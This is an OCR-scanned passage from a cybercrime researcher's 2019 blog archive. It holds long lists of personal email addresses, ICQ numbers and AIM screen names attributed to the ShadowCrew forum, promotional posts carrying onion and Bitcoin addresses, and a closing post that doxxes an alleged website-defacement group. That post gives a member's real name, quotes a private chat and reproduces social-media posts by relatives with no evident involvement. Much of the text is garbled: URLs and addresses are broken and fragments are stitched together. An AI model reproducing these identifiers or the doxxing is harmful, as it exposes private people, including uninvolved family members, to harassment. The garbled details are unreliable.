mixter@newyorkoffice.com 
deraadt@cvs.openbsd.org 
dittrich@cac.washington.edu 
bgreenbaum@securityfocus.com 


neil@bortnak.com 
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annemarie@counterpane.com 
chris.kuethe@ualberta.ca 
bob.beck@ualberta.ca 
tan@atstake.com 
natasha@snort.org 
arr@watson.org 
aempirei@ucla.edu 
ggolomb@enterasys.com 
jfrank@b-ap.com 
robert@infoserf.net 
kkuehlI@cisco.com 
donna.andert@sun.com 
bmc@snort.org 
jgary@clicktosecure.com 


jpavlick@sourcefire.com 


talisker@networkintrusion.co.uk 


jwalchuc@enterasys.com 
itay@imc.nl 
halvar@blackhat.com 
ppY@ldealRealms.com 
forrest@code-lab.com 
mconley@atstake.com 
jennifer@granick.com 
scott@microsoft.com 


ah@securityfocus.com 
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cruci@hwa-security.net 
solar@openwall.com 
ivan.arce@corest.com 
rlogan@camisade.com 
cmg@uab.edu 
jed@grep.net 
vOnelmO0@best.com 
snorthcutt@hawaiian.net 
frank@ccc.de 
dmckay@microsoft.com 
jwilkins@bitland.net 
kf@gnosys.biz 
unlearn@ne.mediaone.net 
jor5@darkridge.com 
shok@dataforce.net 
thegnome@nmrc.org 
ofir@sys-security.com 
provos@umich.edu 
silvio@big.net.au 
mike@infonexus.com 
crispin@wirex.com 
halfdead@phear.org 
niness@devilness.org 
curtis.king@messagingdirect.com 


rob@incident-response.org 
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kam@aversion.net 
fuk@ghettobox.eurocompton.net 
merharm@wra.net 
zmagic@phear.org 
inter@logos.relcom.ru 
alive@blazinfyre.net 
daemon@esmith.geezernet.nu 
nwonknu@dsI-65-187-119-141.telocity.com 
abramelon@cpn.cookchildrens.org 
thegnome@nrmc.org 
me@btinternet.com 
Administrator@hotmail.com 
redeemer@gOtr00t.net 
bOiler@hotmail.com 
who@radiofreesatan.com 
poolemit@mailvault.com 
fuckyoutxtax@hell.com 
proxydialup@yahoo.com 
info@megastep.com 
sales@diplomaone.com 
abuse@teledisnet.be 
NOC@sprint.net 
dvlpmntsftwr@hotmail.com 
stepgas@hotmail.com 


rra33@hotmail.com 
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cody@server.snni.com 
kwparris@csuh.alunlink.com 
wolfram@counterfeitcards.com 


whoever@hotmail.com 


Sample Public ICQ UIN Numbers of ShadowCrew Cybercrime Forum Community circa 
2002-2004: 


999008 


9773639 
974763 
97254007 
95211861 
92754913 
914506 
89531566 
8923240 
86958674 
802820 
777726 


74623265 
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7444304 


690033 


6666666 


637321 


62527577 


598629 


59838986 


56714884 


56327073 


5556665 


517196 


48721062 


47564547 


4545 


44203686 


41781 


3727374 


362563 


35 


348140 


33342322 


332163 


330332251 


327539466 


320455282 
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320100851 


319326887 


31485639 


304060 


29457002 


288687540 


288670074 


266472842 


26633491 


264975608 


2482045 


236790331 


230406 


222567486 


222409185 


22063094 


219747908 


21386767 


213201784 


212719246 


19457815 


193200333 


1881621 


179251032 


178954300 
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178832228 


178420526 


178210999 


178101166 


178020075 


177541908 


177507739 


177394922 


177016428 


176824746 


176531816 


175688952 


175596058 


175521773 


175350857 


175308348 


175157730 


174902318 


174760817 


174537112 


174511919 


174445299 


173846049 


173838529 


173767788 
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17359522 


173387414 


173299970 


173254582 


173019781 


173002204 


172674035 


172476811 


172290141 


172252866 


172021743 


171975533 


171805992 


1715300002 


171468368 


171440228 


170627352 


170324565 


170036758 


169769760 


169243371 


169220281 


169006693 


168834059 


168769080 
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168675160 


168595955 


168495889 


168422846 


168413916 


167927175 


167897380 


167636937 


167023436 


166657595 


166581197 


166407706 


165969755 


165638624 


165546617 


164872312 


164165878 


164008345 


162852265 


1601617 


158807983 


15652907 


154866004 


152616 


150860495 
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139736678 
130915854 
11402050 
1111111 
10966997 
107021 
105233239 
103363810 
100631 


100161 


Sample Public IM User Names of ShadowCrew Cybercrime Forum Community circa 
2002-2004: 


aim:goim?screenname=youngglobeman &message=Hello+Are+you+there? 


aim:goim?screenname=yeezz0r &message=Hello+Are+you+there? 
aim:goim?screenname=xkyroutx &message=Hello+Are+you+there? 
aim:goim?screenname=wisie459 &message=Hello+Are+you+there? 


aim:goim?screenname=whailen &message=Hello+Are+you+there? 
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aim:goim?screenname=wgrumpke &message=Hello+Are+you+there? 
aim:goim?screenname=verbal0g &message=Hello+Are+you+there? 
aim:goim?screenname=unbreakable2009 &message=Hello+Are+you+there? 
aim:goim?screenname=TopHolos &message=Hello+Are+you+there? 
aim:goim?screenname=thenightmaresx &message=Hello+Are+you+there? 
aim:goim?screenname=thelistguysc &message=Hello+Are+you+there? 
aim:goim?screenname=theblinkstud182 &message=Hello+Are+you+there? 
aim:goim?screenname=Tandrek &message=Hello+Are+you+there? 
aim:goim?screenname=t909j &message=Hello+Are+you+there? 
aim:goim?screenname=t0astypimp &message=Hello+Are+you+there? 
aim:goim?screenname=Spaceman$Spiff742 &message=Hello+Are+you+there? 
aim:goim?screenname=sp+e+ar+legolas &message=Hello+Are+you+there? 
aim:goim?screenname=someguy/98 &message=Hello+Are+you+there? 
aim:goim?screenname=SomeCallMe+Byrd &message=Hello+Are+you+there? 
aim:goim?screenname=Sly+Immigrant &message=Hello+Are+you+there? 
aim:goim?screennames=sirnoface &message=Hello+Are+you+there? 
aim:goim?screenname=Sir+Aristrotle &message=Hello+Are+you+there? 
aim:goim?screenname=shaubarak &message=Hello+Are+you+there? 
aim:goim?screenname=shadylady18693 &message=Hello+Are+you+there? 
aim:goim?screenname=shady007 &message=Hello+Are+you+there? 
aim:goim?screenname=Screen+Serv &message=Hello+Are+you+there? 
aim:goim?screenname=ScottScurlock &message=Hello+Are+you+there? 
aim:goim?screenname=Sconoscuito &message=Hello+Are+you+there? 
aim:goim?screenname=SC-+Talos &message=Hello+Are+you+there? 


aim:goim?screenname=savemejebus179 &message=Hello+Are+you+there? 
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aim:goim?screenname=retarded+shit &message=Hello+Are+you+there? 
aim:goim?screenname=redundantcheese &message=Hellot+Are+you+there? 
aim:goim?screenname=redbossaline &message=Hello+Are+you+there? 
aim:goim?screenname=rawistravis &message=Hello+Are+you+there? 
aim:goim?screenname=psndudel &message=Hello+Are+you+there? 
aim:goim?screenname=progressiveccna &message=Hello+Are+you+there? 
aim:goim?screenname=platinum54door &message=Hello+Are+you+there? 
aim:goim?screenname=phs2602 &message=Hello+Are+you+there? 
aim:goim?screenname=pg043 &message=Hello+Are+you+there? 
aim:goim?screenname=perfectids &message=Hello+Are+you+there? 
aim:goim?screenname=pbushe000 &message=Hello+Are+you+there? 
aim:goim?screenname=overviewband &message=Hellot+Are+you+there? 
aim:goim?screenname=ourorgasms &message=Hello+Are+you+there? 
aim:goim?screenname=Original+Boski &message=Hello+Are+you+there? 
aim:goim?screenname=oofzpumba &message=Hello+Are+you+there? 
aim:goim?screenname=octane &message=Hello+Are+you+there? 
aim:goim?screenname=novidus &message=Hello+Are+you+there? 
aim:goim?screenname=NONE &message=Hello+Are+you+there? 
aim:goim?screenname=none &message=Hello+Are+you+there? 
aim:goim?screenname=Nobelc4t &message=Hello+Are+you+there? 
aim:goim?screenname=NiggaDJackingDaHole &message=Hello+Are+you+there? 
aim:goim?screenname=na &message=Hello+Are+you+there? 
aim:goim?screenname=N/A &message=Hello+Are+you+there? 
aim:goim?screenname=mwdropout &message=Hello+Are+you+there? 


aim:goim?screenname=mustophamond &message=Hello+Are+you+there? 
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aim:goim?screenname=mtnhardware121 &message=Hello+Are+you+there? 
aim:goim?screenname=MrUntouchableSC &message=Hello+Are+you+there? 
aim:goim?screenname=mrmojorising97 &message=Hello+Are+you+there? 
aim:goim?screenname=MonetaryAffairs &message=Hello+Are+you+there? 
aim:goim?screenname=Mofia+MG &message=Hello+Are+you+there? 
aim:goim?screenname=mikeyb7895 &message=Hello+Are+you+there? 
aim:goim?screenname=miamimac305 &message=Hello+Are+you+there? 
aim:goim?screenname=meyercl101 &message=Hello+Are+you+there? 
aim:goim?screenname=MentalHpscotch &message=Hello+Are+you+there? 
aim:goim?screenname=menlochronic &message=Hello+Are+you+there? 
aim:goim?screenname=madcarder@aol.com &message=Hello+Are+you+there? 
aim:goim?screenname=mach844 &message=Hello+Are+you+there? 
aim:goim?screenname=LOSSisback &message=Hello+Are+you+there? 
aim:goim?screenname=linuxgeek99 &message=Hello+Are+you+there? 
aim:goim?screenname=LinuxDevil &message=Hello+Are+you+there? 
aim:goim?screenname=lazystatefan &message=Hello+Are+you+there? 
aim:goim?screenname=lady 

aim:goim?screenname=kickinhard2002 &message=Hello+Are+you+there? 
aim:goim?screenname=jwillvip &mMessage=Hello+Are+you+there? 
aim:goim?screenname=johnvd18 &message=Hello+Are+you+there? 
aim:goim?screenname=JMOExtremeS10 &message=Hello+Are+you+there? 
aim:goim?screenname=jeffsm31337 &message=Hello+Are+you+there? 
aim:goim?screenname=jedisgod &message=Hello+Are+you+there? 
aim:goim?screenname=jeadien &message=Hello+Are+you+there? 


aim:goim?screenname=JCDyer82 &message=Hello+Are+you+there? 
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aim:goim?screenname=jOke+y4+mind &message=Hello+Are+you+there? 
aim:goim?screenname=IrOnMaN800 &message=Hello+Are+you+there? 
aim:goim?screenname=IDLineNTT &message=Hello+Are+you+there? 
aim:goim?screenname=icerootl &message=Hello+Are+you+there? 
aim:goim?screenname=lamOms &message=Hello+Are+you+there? 
aim:goim?screenname=iamaballer847 &message=Hello+Are+you+there? 
aim:goim?screenname=HRSAFTER &message=Hello+Are+you+there? 
aim:goim?screenname=gosuns1965 &message=Hello+Are+you+there? 
aim:goim?screenname=globalflux &message=Hello+Are+you+there? 
aim:goim?screenname=Frozenct &message=Hello+Are+you+there? 
aim:goim?screenname=fonefag &message=Hello+Are+you+there? 
aim:goim?screenname=flameboysk8erl3 &message=Hello+Are+you+there? 
aim:goim?screenname=firewirelD &message=Hello+Are+you+there? 
aim:goim?screenname=FenderESP &message=Hello+Are+you+there? 
aim:goim?screenname=Feces@Poop.org &message=Hello+Are+you+there? 
aim:goim?screenname=fdsf &message=Hello+Are+you+there? 
aim:goim?screenname=everybodyschild &message=Hello+Are+you+there? 
aim:goim?screenname=esolemio &message=Hello+Are+you+there? 
aim:goim?screenname=erols26 &message=Hello+Are+you+there? 
aim:goim?screenname=ElMariachiMoco &message=Hello+Are+you+there? 
aim:goim?screenname=Edgarkrasav &message=Hello+Are+you+there? 
aim:goim?screenname=EddieG2277 &message=Hello+Are+you+there? 
aim:goim?screenname=edOwn &message=Hello+Are+you+there? 
aim:goim?screenname=drunknsailorl &message=Hello+Are+you+there? 


aim:goim?screenname=dk3 &message=Hello+Are+you+there? 
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aim:goim?screenname=djdonte69 &message=Hello+Are+you+there? 
aim:goim?screenname=Degauss007 &message=Hello+Are+you+there? 
aim:goim?screenname=dEeliriOous &message=Hello+Are+you+there? 
aim:goim?screenname=d0l3m1k3 &message=Hello+Are+you+there? 
aim:goim?screenname=cyptdog &message=Hello+Are+you+there? 
aim:goim?screenname=crommnz &message=Hello+Are+you+there? 
aim:goim?screenname=cpuaddict123 &message=Hello+Are+you+there? 
aim:goim?screenname=chemist+exposed &message=Hello+Are+you+there? 
aim:goim?screenname=CASLUSCLAY@AOL.COM &message=Hello+Are+you+there? 
aim:goim?screenname=cardseller420 &message=Hello+Are+you+there? 
aim:goim?screenname=Brydenn33 &message=Hello+Are+you+there? 
aim:goim?screenname=Boomsicka &message=Hello+Are+you+there? 
aim:goim?screenname=BoOtyMOnster &message=Hello+Are+you+there? 
aim:goim?screenname=Bluedevelz &message=Hello+Are+you+there? 
aim:goim?screenname=BLaZiNKeWP &message=Hello+Are+you+there? 
aim:goim?screenname=blackrob91@aol.com &message=Hello+Are+you+there? 
aim:goim?screenname=BlaCkiCe8636 &message=Hello+Are+you+there? 
aim:goim?screenname=BlackBag Tricks &message=Hello+Are+you+there? 
aim:goim?screenname=BigBoil881 &message=Hello+Are+you+there? 
aim:goim?screenname=benjaminbahr &message=Hello+Are+you+there? 
aim:goim?screenname=Belacel123 &message=Hello+Are+you+there? 
aim:goim?screenname=badandy1318 &message=Hello+Are+you+there? 
aim:goim?screenname=Ashlkam &message=Hello+Are+you+there? 
aim:goim?screenname=Asdf324tt &message=Hello+Are+you+there? 


aim:goim?screenname=ar-+naf &message=Hello+Are+you+there? 
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aim:goim?screenname=ApUzllLa &message=Hello+Are+you+there? 
aim:goim?screenname=anonraider &message=Hello+Are+you+there? 
aim:goim?screenname=alkoholikboy &message=Hello+Are+you+there? 
aim:goim?screenname=airj3r &message=Hello+Are+you+there? 
aim:goim?screenname=aftermath1024 &message=Hello+Are+you+there? 
aim:goim?screenname=absentdreamerr &message=Hello+Are+you+there? 
aim:goim?screenname=45645645 &message=Hello+Are+you+there? 


aim:goim?screenname=111111 &message=Hello+Are+you+there? 


Let’s show them how it’s done! Send a message at ddanchev@cryptogroup.net to coordinate 
and discuss! Stay tuned! 
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1. ttps://1.bp.blogspot.com/-izGFehF5J9A/XabtzVOk- 11/AAAAAAAAJgk/p6- b3q40H-Qwcg7K4TTK6Iuu-Oc9XiFHACLcBGAs 
Q/s1600/Western_Union_ShadowCrew_Cybercrime_Forum. png 


15.10 November 


15.10.1 New Commercial Security Research OSINT Cybercrime Research and 


Threat Intelligence Gathering Services Portfolio Available On Demand! 
(2019-11-02 18:14) 
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Dear blog readers, 


| wanted to let everyone know of a currently active commercial portfolio of services that 
I’m publicly offering for the purpose of reaching out to colleagues and friends including 
companies vendors and organizations who might be interested in working with me for the 
purpose of obtaining access to never-published before Security Research analysis reports 


briefs podcasts and various other commercially obtainable virtual and cyber assets that you 
and your organization can take advantage of. 
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Approach me at - dancho.danchev@hush.com today to discuss! 


Key Commercial Services that I’m currently offering include: 


Including the following commercial services available on [6]Patreon Community: 


[1]Security Services 
[2]OSINT Services 
[3]Hacking Services 
[4]Intelligence Services 


[5]Geopolitical Services 


Real-Time Security Consultation 
Security Newsletter 

Cybercrime Blog Post 

Security Podcast 

Malware Analysis 

Threat Intelligence Analysis 

Security Workshop 

OSINT Analysis 

Geopolitical Analysis 

Threat Actor Profiling 

National Security Analysis 

Cyber Jihad Analysis 

Dark Web Intelligence and OSINT Analysis 
Security Presentation 

Cyber Security Business Development 


Red Team Penetration Testing Assessment 
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¢ Blue Team Penetration Testing Assessment 


Target of Opportunity Targeting 
¢ Cybercrime Forum Monitoring 
¢ Underground Chatter Monitoring 


¢ Network Deception Consultation 


Military Scenario Building 
¢ Cyber Warfare Scenario Building 
¢ OSINT Enrichment and Data Mining 


¢ Cyber Warfare Program Estimation 


Weapons System Analysis 


Cyber SIGINT and Cyber Assets Discovery 


Stay tuned! 


1. fitipa://anit-108  ong/security-serviced 
2, heepe: //unit-129org/osint-serviced 

3, https: //anit~128.org/nacking- serviced 

4, hetpe://anit-129.org/intelligence- serviced 
5, https: //anit~128. org/geopolitical-serviced 
6. hepa: //www.patreon con/ddanchevi23 


15.10.2 Dancho Danchev’s Primary Contact Points - 2019 (2019-11-02 19:02) 


Dear blog readers, in this post I’ll provide and feature my primary contact points for 2019 
in order for you to approach me regarding possible research feedback research requests job 
career opportunities and possible event presentations. 


Users interested in approaching me regarding a possible participation in classified or 
sensitive projects including possible job career opportunities and Threat Data access requests 
can approach me at - dancho.danchev@hush.com 


Looking forward to hearing from you! 


Enjoy! 
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15.10.3 Exposing Russia’s Most Wanted Cybercriminals - An OSINT Analysis 
(2019-11-02 19:03) 


15.11 December 


15.11.1 New Cybertronics - VR for Hackers and Security Experts Dark Web Onion 
Address (2019-12-02 10:15) 


[1] 


Dear blog readers, 


| wanted to let everyone know that I’ve recently changed the official Dark Web Onion 
address for my Cybertronics - VR for Hackers and Security Experts Project including the actual 
Bitcoin donation address. 


GOt _Bitcoin? Consider going through the~ project’ proposal today - 
http://Ikzihepprihxtvbutjedoazbsqd4avmifhpjms3zuq7itceiu4qajwad.onion/ includ- 
ing to make aé_ possible Bitcoin donation using the following Bitcoin Address: 
3J8)Jt7 XCBGtCL6XRLTWhKfRQBmhhqGs4aP 


| wanted to say a big thanks to everyone who approached me in terms of the project in- 
cluding to actually make a donation. The official schedule release is scheduled for January, 
2020 and I'll make sure to keep everyone posted on current and future project updates. 


Stay tuned! 


1. https://1.bp.blogspot . com/-ehaEPpBHRKw/XeTGikGH8TI /AAAAAAAAIJxY/ACcKr9yGHPgPWq1jSdxE-4Ywa- oqdLb6gCLcBGAsYHQ 
s1600/Cybertronics.png 


15.11.2 Official World Hacker Global Domination Group (WHGDG) Dark Web Onion 
Launch! (2019-12-02 10:16) 
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World Hacker Global Domination Group 


-Est. 2019- 


Dear blog readers, 


I’ve been spending more time on the Dark Web these days including the active launch- 
ing of a second Dark Web Onion and the official launch of the World Hacker Global Domination 
Group (WHGDG) which is basically a Call for Papers Call for Participation and Call for Innovation 
request on behalf of me for the purpose of reaching out to the U.S Intelligence Community as 
an independent contractor for the purpose of presenting and eventually getting funding for a 
variety of commercial cyber security and hacking including Threat Intelligence and Offensive 
Cyber Warfare Projects including the active recruitment of new members. 


Check out the Official Dark Web Onion: 


http://nexvibpe4xszfx4cp2jldkdyhnjnah5qnckoagoiry3vpyv5eheh55id.onion/ and don’t 
forget to visit Cybertronics - Virtual Reality Social Network for Hackers and Cyber Se- 
curity Experts Bitcoin-accepting Project - http://ca7brwpxmnbssdoh4dfoijyr7zwetob74- 
x3berlvmeekhmkt7zcjdjqd.onion/ and donate today! 
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How you can participate? 


¢ Visit the Dark Web Onion and go through the Call for Participation Call for Papers and Call 
for Innovation and approach me at ddanchev@cryptogroup.net in case you believe that 
you can contribute with knowledge data and expertise including the technical "know-how" 
to participate in any of the Key Points mentioned in the Dark Web Onion 


Stay tuned for a major Web Site update by the end of the week including the production of 
an extremely popular Security Podcast Security Vlog and an additional set of never-published 
before possibly classified and sensitive Technical Data and Cyber Security and Hacking 
resources. 


Enjoy! 


15.11.3 Dancho Danchev’s Twitter Account - 2010 - Direct Download Link - Historical 
OSINT (2019-12-02 10:19) 


Dancho Danchev 


en.wikipedia.org/wiki/Dancho_Da... 


Dear blog readers, 


Takes you back doesn’t it? I’ve decided to share with you a [1]direct download link of 
my old [2]Twitter account for you to download and go through and to say big thanks to ev- 
eryone who’s been keeping in touch with me throughout 2008-2013 including actual research 
work and related research inquiries. 


Consider going through the archive and catching up with some of my research circa 
2010-2014 and approach me - ddanchev@cryptogroup.net with your feedback or just to say 
hi in case you remember some of the research which | used to publish back then. 
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Stay tuned! 


1. https://unit-123.org/wp-content/uploads/2019/11/Dancho_Danchev_Tweets_2010-1.zip 
2. https://twitter.com/danchodanche 


15.11.4 Join me on Medium! (2019-12-02 10:59) 


HNNCast052110 


i roobizes 


+ Collect This Video Eli Like Share ¥ Flag as objectionable or broken - 1 Views - 1 Collector 


Dear blog readers, 


| wanted to let everyone know that I’ve recently joined [1]Medium and that | intend to 
post a variety of editorial type of articles on a daily basis including the fact that | was recently 
featured as a Top Writer in [2]Privacy. 
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Missing the editorial? Consider going through my old [3]ZDNet Zero Day Blog content 
archive including the following recently published editorial type of articles on Medium: 


¢ [4]Assessing U.S Military Cyber Operational Capabilities to Counter Pro-ISIS Internet In- 
frastructure 


¢ [5]My Involvement in the Top Secret GCHQ “Lovely Horse” Program and the Existence of 
the Karma Police 


¢ [6]Kaspersky’s Antivirus Products the NSA and U.S National Security — An Analysis 


¢ [7]Assessment of U.S Intelligence Community Cyber Surveillance Programs and Trade- 
craft — Part One 


¢ [8]How the NSA utilized Iranian Cyber Proxies To Participate in the BOUNDLESS INFOR- 
MANT Program? 


¢ [9]Exposing GCHQ’s Top Secret “GORDIAN KNOT” Cyber Defense Sensor Program — An 
Analysis 


¢ [10]Exposing GCHQ’s URL-Shortening Service and Its Involvement in Iran’s 2009 Election 
Protests 


Stay tuned! 


1. https: //medium.com/@danchodanche 
2. https://medium. com/tag/privac 
3. https://www.zdnet .com/meet-the-team/us/dancho-danchev/ 


4. https: //medium.com/@danchodanchev/assessing-u-s-military-cyber-operational-capabilities-to-counter-pro-i 


sis-internet-infrastructure-e4914bd8fb8c 


5. https://medium.com/@danchodanchev/my-involvement- in-the-top-secret-gchq-lovely-horse-program-and-the-exi 


stence-of-the-karma-police-daaf08b028a2 


6. https://medium. com/@danchodanchev/my-involvement-in-the-top-secret-gchq-lovely-horse-program-and-the-exi 


stence-of-the-karma-police-daaf08b028a2 


7. ttps: //medium.com/@danchodanchev/assessment- of-u-s-intelligence-community-cyber-surveillance-programs- 


d-tradecraft-part-one-24c29418107b 


8. https://medium. com/@danchodanchev/how-the-nsa-utilized-iranian-cyber-proxies-to-participate-in-the-bound 


less-informant-program-e82045d44848 


9. https: //medium. com/@danchodanchev/exposing-gchqs-top-secret- gordian-knot-cyber-defense-sensor-program-a 


analysis-—db64aa8a62ea 


10. https: //medium. com/@danchodanchev/exposing-gchqs-url-shortening-service-and-its-involvement-in-iran-s-20 


09-election-protests-6c6a9282630 


7155 


15.11.5 gOt Bitcoin? - Part Two (2019-12-04 18:15) 


Cybertronics 


Dear blog readers, 


| wanted to let you know that I’ve recently changed to a permanent [1]Dark Web Onion 
address - for my [2]Cybertronics - Virtual Reality Social Network for Hackers and Security 
Experts where I’m currently soliciting Bitcoin donations for the purpose of launching the 
project in January, 2020. 


Got Bitcoin? Consider visiting the Dark Web Onion and making a donation today and 
stay tuned for the upcoming updates and actual launch of the project in January, 2020 - 
http://Ikzihepprihxtvbutjedoazbsqd4avmifhpjms3zuq7itceiu4qajwad.onion/ 


Stay tuned! 


1. https: //ddanchev.blogspot .com/2019/08/g0t-bitcoin.htm 
2. https: //ddanchev.blogspot .com/2019/12/new-cybertronics-vr-for-hackers-and. htm 
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15.11.6 Announcing New Hacking Security and Hacktivism-Themed Online Forum 
Community! Join me Today! (2019-12-12 19:00) 


Securtiy is Futile 


Dear blog readers, 


I’ve recently launched an extremely popular and comprehensive Hacking and Security 
possibly Hacktivism-Themed Online Forum Community called "[1]Security is Futile" using the 
extremely popular [2]PlushForums Platform consisting of over 193 Hacking and Security 
Topic Categories. 
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The initial idea behind launching the community is to spread data information and knowledge 
and to provoke discussion into various hot Hacking and Security topics including to solicit 


high-profile VIP Hacker and Security Experts to actually join the community and contribute 
with content. 


Official "Security is Futile!" Hacking and Security Forum Community URL: 


https://forums.offensive-warfare.com 


Stay tuned! 


1. https://forums.offensive-warfare.com/ 
2. https://plushforums.com/ 


15.11.7 Announcing Law Enforcement and OSINT Intelligence Operation "Uncle 
George" - Join Me Today! - Part Two (2019-12-12 19:12) 
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<parent> Darkmoney iHonker ShadowMarket 
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365Exe DomenForum Linuxac.org Spyhackerz 
419eater Eviloctal Master-X Svuit.vn 
4HatDay Exelab MasterWebs Szenebox 
aHack Forum-UINSell MaulTalk Szuwi 
Aljyyosh Forum.Zloy_bz Mmpg.ru Tenebris 
Antichat.ru ForumSape = Mr11-11mr.7olm.org TheBot 
ArmadaBoard ForumSEO Nullnoss.org Toolbabase.se 
BigFozzy Free-hack pay-per-install.org — TotalBlackhat 
BlackhatWorld ghostmarket.net PhreakerPro Turkhackteam 
BPCForum Gla.vn Piratebuhta.pw Vsehobby 
Cardvilla GoFuckBiz ProCrd Webmasters.ru 
Chf gofuckbiz.com ProLogic Whitehat.vn 
CNHonker H4kurd.com Promarket WWH-Club 
CNSec Hack-Port ProxyBase www.opensc.ws 
Crack-Forum Hackersoft scamwarners Xakep.bg 
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Cyberizm Hackings SEOForum Zismo 
Darkmarket.la iFud 


Dear blog readers, 


| wanted to let you know that I’ve been spending more time doing active Security Indus- 
try outreach in terms of the [1]2019 Cybercrime Forum Data Set and that I’ve already started 
working with several vendors in terms of possible OSINT enrichment and actual processing of 
the data. 


Perfect timing to say thanks to Ilya Timchenko and McAfee for actually reaching out and 
managing to process the following artifacts from the actual Data Set which I’ve decided to 
publicly share with everyone who reaches out and expresses interest in working with me on 
the Data Set with the idea to possibly assist the Security Community and Law Enforcement 
in terms of tracking down the individuals behind these campaigns and actually shutting them 
down. 


Possible Personally Identifiable Artifacts Found in the Actual Data Set Include: 


7159 


[2]Cybercriminal Cryptocurrency Addressess 


[3]Cybercriminal Emails 


[4]Cybercriminal ICQ Numbers 


[5]Cybercriminal Phone Numbers 


[6]Cybercriminal QQ IDs 


[7]Cybercriminal Telegram IDs/[8]Telegram IDs 


[9]Cybercriminal Dark Web Onion Addresses 


[10]Cybercriminal Viber Accounts 


[11]Cybercriminal VK Accounts 


[12]Cybercriminal XMPP Accounts 


Including the following massive update courtesy of me including all the publicly obtainable 
[13]Email Addresses obtained from the 2019 Cybercrime Forum Data Set including all the 
publicly obtainable [14]IP Addresses obtained from the 2019 Cybercrime Forum Data Set 
which appear to be mostly Socks4/Socks5 and publicly accessible compromised hosts used 
for "island-hopping" tactics. 


I'll be posting an updated set of analysis and data regarding the currently ongoing [15]Law 
Enforcement and OSINT Intelligence Operation "Uncle George" anytime soon. 


Approach me at ddanchev@cryptogroup.net in case you're interested in working with 
me on this project or want to obtain access to the actual Data Set for possible OSINT enrich- 
ment and research purposes. 


Stay tuned! 


: i law-enforcement-and-osint .htm 


ttps://unit-123.org/wp-content/uploads/2019/12/cryptocurrency.txt 
ttps://unit-123.org/wp-content/uploads/2019/12/emails.txt 
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10. 
11. 
12. 
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13. https: //unit-123.org/wp-content/uploads/2019/12/Misc_01.txt 
14. https: //unit-123.org/wp-content/uploads/2019/12/Misc_02.txt 
15. https: //ddanchev.blogspot .com/2019/10/announcing-law-enforcement-and-osint .html 


15.11.8 Happy Holidays! (2019-12-23 20:08) 


Dear blog readers, 


It’s been a pleasure and an honor to serve your needs since December, 2005 when I’ve 
officially opened this blog while working as a Managing Director for Astalavista.com - The 
Underground and | sincerely hope that you’ll continue to find my research informative and 
quality enough to further recommend my personal blog to friends and colleagues including to 
possibly approach me in terms of seeking additional information regarding a particular blog 
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post or to actually "say hi" and "keep up the good fight" type of message. 


My 2020 primary contact points include: 


Personal Email - ddanchev@cryptogroup.net 


Social Media Accounts - [1]Twitter, [2]LinkedIn, [3]Facebook, [4]Angellist, [5]YouTube, 
[6]Medium 


IM and Skype ID: [7]dancho danchev _ 


Web properties that I’m currently running include - [8]Offensive Warfare 2.0 and [9]Unit- 
123.org 


XMPP/OMEMO ID for Real-Time Conversation: 90184@armadillophone.com which is ba- 
sically compatible with [10]ChatSecure [11]Conversations and [12]Dino - feel free to install 
any of these applications in case you’re not using them already and feel free to "say hi". 


Happy holidays and thanks a lot for everyone who’s been keeping in touch and keeping 
up the good fight! 


Stay tuned! 


. https: //linkedin.com/in/danchodanche 

. https: //www.facebook.com/dancho.danchev. 1048 
. https: //www.youtube.com/channel/UC-kG5H10irayFMfukwEPKf 

. https: //medium.com/@danchodanchev, 


. https: //forums .offensive-warfare .com/ 
_ https: //unit-123.org/ 

_ https: //chatsecure . org/ 

. https://conversations. im/ 

12. https: //dino. im/ 
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15.11.9 Exposing High Tech Brazil Hack Team Mass Web Site Defacement Group - An 
OSINT Analysis (2019-12-27 15:38) 
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) i www-dans.bq/tmp/ 


|) www.dans.bg/tmp/ 


Hackeado por HighTech Brazil HackTeam 
No\One - CrazyDuck - Otrasher - L34NDRO 


It’s been a while since I’ve last posted on quality update further detailing the inner workings 
of a high-profile and prominent Web Site Defacement group that has managed to successfully 
compromise thousands of Web sites internationally that also includes Bulgaria’s National 
Security Agency (DANS) - hxxp://dans.org Web site. 


In this post I'll provide actionable intelligence including personally identifiable informa- 
tion on the people and the gang behind the campaign including an in-depth analysis of their 
tactics techniques and procedures including personal photos and social media accounts of the 
infamous High Tech Brazil Hack Team whose responsible for having successfully defaced over 
5,000 legitimate Web Sites internationally. 


Team Members Include: 
- crazyduck - Real Name: Fabian de Souza Peralazzo 


- otrasher - Email: Otrasher@live.com - Social Media Account - https://twitter.com/b1tchx 


- I34NDRO 
- wicked 
- live 


- Smoker 


7163 


Sample Photos of High Tech Brazil Hack Team Team Members: 
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[22:00:43] (CrazyDuck) Nao sei se tu faz 

[22:00:45] (CrazyDuck) Mas tipo 

[22:00:49] (CrazyDuck) Limpar, pegar o papel 

[22:00:52] (CrazyDuck) E dar uma xeiradinha 

[22:00:54] (CrazyDuck) Nunca fez? 

[22:01:04] (SynchrONize) nao 

{22:01:08} (SynchrONize) eu aopenas olho 

{22:01:11} (SynchrONize) pra saber se jatalimpo 

[22:01:14] (SynchrONize) cheirar é mto gore 

[22:01:15] (SynchrONize) kkkkkkk 

[22:01:21] (CrazyDuck) Teve uma epoca que eu tava mais podrao 
[22:01:25] (CrazyDuck) Antes de dar descarga 

[22:01:32] (CrazyDuck) Eu colocava quase o nariz dentro do vaso 
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SynechrONize 
@synchrOntze 


PHighTech Brazil HackTeam } (#] zone-R.org/acchive/specia. #[#] 


SynchrONize gained 


new followers this week 


GQOOGS >. 


Gain followers with @justunfollow 
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BG OuickMemo 
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S| Francine Maglia 


Te amOooo meu inmn’o queridoco..... Obrigada 


por tudo I"! 
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“I frascine Maglia 


&) 5 poopie tke this 


1 ini 

BB: 

ri] Wh | | ia Plrvietha Catalan Que liedicspumenen tb 
| terberadanaa 7 

il ‘a itl 


Francine Magia Mae ebrigada por tudo a 
ira ch mew exemple de vida Il! Te amoco 
metoo0Oe 


or 
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Paula Souzza 
Folin ‘ 
View on Instagram 


E quando saio do banho me deparo com essa 
cena: amor resume with Brumao Maglia 


> 49 people like this. 


oe 
(7? ishare 


Brumac Maglia game over! @ 
es % abri © 2680 Qdo voce tava Brando ele € Capote: 
Greve khkckiickide 


mecembe 2,2 tS 24a Uke 1 


Paula Souzza Dei beijo nos Gols, ¢ 05 dots 
resevego! HUAUHAU @&® 


pece 2 2 25a Uke 


Marilda Ferreira Maglia Paula e432 foto termes 
Que Quardar muito,ts lings. 
wecembe 2013 at 0:19 Uke <2 


Home Find Frierxis Gilly 


Timeline About Photos Friends More ¥ 


Do you know Paula? 


To see what she shares with friends, send her a friend request #4 Add Friend 


About 
